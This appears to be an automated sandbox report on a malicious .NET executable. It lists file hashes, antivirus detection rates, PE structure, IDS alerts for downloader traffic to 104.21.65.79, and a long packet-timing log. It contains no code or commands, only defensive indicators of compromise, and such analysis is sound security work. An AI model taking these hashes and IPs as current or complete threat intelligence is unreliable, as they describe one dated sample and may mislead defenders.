                            SHA-512:EB0DB729F76C17C71A10130302E58665310596F19111D6ECF0E1FED19BEF60FBE5E41D816D1241D5F58A33F89AEA1D8868AA8600E1D256AF80C45475DA68605C
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 37%
                            • Antivirus: Virustotal, Detection: 24%, Browse
                            Process:C:\Users\user\Desktop\Mu7iyblZk8.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:true
                            Preview:[ZoneTransfer]....ZoneId=0
                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Entropy (8bit):5.8008179820157535
                            TrID:
                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                            • Win32 Executable (generic) a (10002005/4) 49.78%
                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                            • Generic Win/DOS Executable (2004/3) 0.01%
                            • DOS Executable Generic (2002/1) 0.01%
                            File name:Mu7iyblZk8.exe
                            File size:79'872 bytes
                            MD5:74f11a170c0a518ce076ae43f70a7c06
                            SHA1:86cafa195ca0905f79a4e877c13ad0c7ced257e5
                            SHA256:efdac8eafdf875de010fe0a6980aad44b547c2a74430c185a28d67e98168c4b3
                            SHA512:eb0db729f76c17c71a10130302e58665310596f19111d6ecf0e1fed19bef60fbe5e41d816d1241d5f58a33f89aea1d8868aa8600e1d256af80c45475da68605c
                            SSDEEP:1536:LMSYHfrowgvVhCU/EKx/s3VntC9vXQqov0cNRf4Dk/So6oa9DJjAWmJCo:LMSsfrowgdh7s3Vt0Qqov7RfCFo6oa9m
                            TLSH:78732AA4ABE8D127C2AB8737F46102050BB5E54B7A42E74B5DCC68CC6E037855F216FB
                            Icon Hash:00928e8e8686b000
                            Entrypoint:0x4151de
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE
                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Time Stamp:0x66A37FB8 [Fri Jul 26 10:51:36 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:4
                            OS Version Minor:0
                            File Version Major:4
                            File Version Minor:0
                            Subsystem Version Major:4
                            Subsystem Version Minor:0
                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                            Name | Virtual Address | Virtual Size | Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_IMPORT | 0x15190 | 0x4c | .text
                            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x16000 | 0xc | .reloc
                            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x151f4 | 0x1c | .text
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_IAT | 0x151ec | 0x8 | .text
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2000 | 0x48 | .text
                            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                            Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                            .text | 0x2000 | 0x13253 | 0x13400 | f9fb99341f919dac4cbd7095ca579daa | False | 0.41098062094155846 | data | 5.840221370483293 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .reloc | 0x16000 | 0xc | 0x200 | 542c40626f7ac06db4fdb8b3d7836890 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                            DLL | Import
                            mscoree.dll | _CorExeMain
                            Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
                            2024-07-27T11:37:19.604629+0200 | TCP | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 49710 | 443 | 192.168.2.9 | 104.21.65.79
                            2024-07-27T11:37:15.181306+0200 | TCP | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 49707 | 443 | 192.168.2.9 | 104.21.65.79
                            2024-07-27T11:37:20.758950+0200 | TCP | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 49711 | 443 | 192.168.2.9 | 104.21.65.79
                            2024-07-27T11:37:14.109499+0200 | TCP | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 49706 | 443 | 192.168.2.9 | 104.21.65.79
                            2024-07-27T11:37:31.016993+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49714 | 13.85.23.86 | 192.168.2.9
                            2024-07-27T11:38:08.651121+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49716 | 40.68.123.157 | 192.168.2.9
                            Jul 27, 2024 11:37:14.192766905 CEST49706443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:14.195516109 CEST44349706104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:14.195574045 CEST49706443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:14.195580006 CEST44349706104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:14.195626974 CEST49706443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:14.195756912 CEST44349706104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:14.195800066 CEST49706443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:14.195802927 CEST44349706104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:14.195842028 CEST49706443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:14.196014881 CEST44349706104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:14.196060896 CEST49706443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:14.196065903 CEST44349706104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:14.196105003 CEST49706443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:14.196109056 CEST44349706104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:14.196146965 CEST49706443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:14.196511030 CEST44349706104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:14.196556091 CEST49706443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:14.196724892 CEST44349706104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:14.196767092 CEST49706443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:14.196779013 CEST44349706104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:14.196818113 CEST49706443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:14.196821928 CEST44349706104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:14.196857929 CEST49706443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:14.197009087 CEST44349706104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:14.197053909 CEST49706443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:14.197057962 CEST44349706104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:14.197101116 CEST49706443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:14.197498083 CEST44349706104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:14.197546959 CEST49706443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:14.197623968 CEST44349706104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:14.197666883 CEST49706443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:14.197694063 CEST44349706104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:14.197729111 CEST49706443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:14.197837114 CEST44349706104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:14.197885036 CEST49706443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:14.198333025 CEST44349706104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:14.198374033 CEST49706443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:14.198499918 CEST44349706104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:14.198544979 CEST49706443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:14.198558092 CEST44349706104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:14.198600054 CEST49706443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:14.198604107 CEST44349706104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:14.198640108 CEST49706443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:14.274663925 CEST44349706104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:14.274735928 CEST49706443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:14.274753094 CEST44349706104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:14.274796009 CEST49706443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:14.282253027 CEST44349706104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:14.282314062 CEST49706443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:14.282352924 CEST44349706104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:14.282403946 CEST49706443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:14.282409906 CEST44349706104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:14.282453060 CEST49706443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:14.282502890 CEST44349706104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:14.282504082 CEST49706443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:14.282529116 CEST44349706104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:14.282536983 CEST49706443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:14.282568932 CEST49706443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:14.282594919 CEST49706443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:14.393023014 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:14.393063068 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:14.393145084 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:14.393765926 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:14.393779993 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:14.876302004 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:14.876492023 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:14.877511978 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:14.877517939 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:14.877710104 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:14.877713919 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.181292057 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.181380033 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.181395054 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.181442976 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.181453943 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.181497097 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.181514978 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.181566954 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.181610107 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.181658030 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.181694031 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.181750059 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.181782007 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.181833982 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.181895018 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.181943893 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.181968927 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.182018042 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.182056904 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.182104111 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.182142019 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.182189941 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.182214022 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.182260036 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.259978056 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.260113955 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.269694090 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.269795895 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.269803047 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.269918919 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.269922018 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.269952059 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.269998074 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.270060062 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.270104885 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.270188093 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.270193100 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.270241976 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.270469904 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.270526886 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.270555019 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.270601034 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.270684958 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.270737886 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.270908117 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.270958900 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.271317005 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.271368980 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.271398067 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.271450996 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.271485090 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.271534920 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.271611929 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.271665096 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.271692038 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.271748066 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.272135973 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.272185087 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.272213936 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.272267103 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.272520065 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.272571087 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.358977079 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.359070063 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.359097958 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.359137058 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.359143019 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.359175920 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.359206915 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.359256983 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.359287977 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.359330893 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.359381914 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.359426975 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.359460115 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.359508038 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.359534979 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.359580994 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.359613895 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.359668970 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.359694004 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.359734058 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.359766960 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.359833002 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.359839916 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.359868050 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.359886885 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.359910965 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.360129118 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.360203028 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.360244989 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.360308886 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.360784054 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.360836983 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.360970974 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.361022949 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.361368895 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.361424923 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.361490965 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.361535072 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.361799955 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.361851931 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.361854076 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.361862898 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.361888885 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.361898899 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.362705946 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.362761974 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.362773895 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.362787008 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.362813950 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.362819910 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.362835884 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.362862110 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.363238096 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.363291979 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.363568068 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.363622904 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.418457985 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.418555021 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.447465897 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.447601080 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.447679996 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.447679996 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.447694063 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.447747946 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.448021889 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.448081017 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.448259115 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.448323011 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.448858023 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.448918104 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.449081898 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.449140072 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.449167013 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.449224949 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.449726105 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.449786901 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.449819088 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.449866056 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.449901104 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.449964046 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.450592995 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.450656891 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.450683117 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.450735092 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.450764894 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.450823069 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.451426029 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.451483011 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.451728106 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.451788902 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.451813936 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.451864004 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.452400923 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.452466011 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.452527046 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.452584982 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.452614069 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.452672005 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.452697039 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.452760935 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.453327894 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.453391075 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.453417063 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.453476906 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.453509092 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.453567982 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.454226971 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.454288960 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.454339027 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.454397917 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.552895069 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.552911043 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.552966118 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.553193092 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.553204060 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.553244114 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.553294897 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.553546906 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.553595066 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.553601980 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.553606987 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.553658009 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.553663969 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.553708076 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.554547071 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.554586887 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.554608107 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.554613113 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.554637909 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.554647923 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.556324959 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.556344986 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.556402922 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.556410074 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.556448936 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.557857037 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.557874918 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.557934046 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.557940006 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.557977915 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.558444977 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.558464050 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.558517933 CEST49707443192.168.2.9104.21.65.79
